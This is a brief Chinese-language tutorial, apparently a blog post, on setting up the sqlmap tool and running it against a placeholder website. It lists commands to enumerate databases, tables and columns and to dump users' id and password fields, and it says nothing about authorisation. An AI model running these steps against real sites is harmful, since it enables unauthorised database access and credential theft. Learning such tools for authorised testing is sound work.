一、sqlmap的使用
1.进入sqlmap。
1.先进官网中下载sqlmap压缩包在进行解压。
2.再命令提示符中写入cd D:\谷歌下载\sqlmapproject-sqlmap-1.4.9-6-gbcea050\sqlmap(就是sqlmap下载的地址)。
3.输入D:(下载的硬盘)就进入sqlmap中了。
就下图所示:
2.获取数据。
1.sqlmap注入网站:sqlmap -u “网站”
2.获取全部数据库:sqlmap -u “网站” --dbs
3.获取数据库中的全部表:sqlmap -u “网站” -D 数据库 --tables
4.获取表单的字段:sqlmap -u “网站” -D 数据库 -T 数据库名 --columns
5.获取用户的id和password:sqlmap -dump -D 数据库 -T 数据库名 -C “id,password”
1.sqlmap注入网站
2.获取全部数据库
3. 获取数据库中的全部表
4.获取表单的字段
5.获取用户的id和password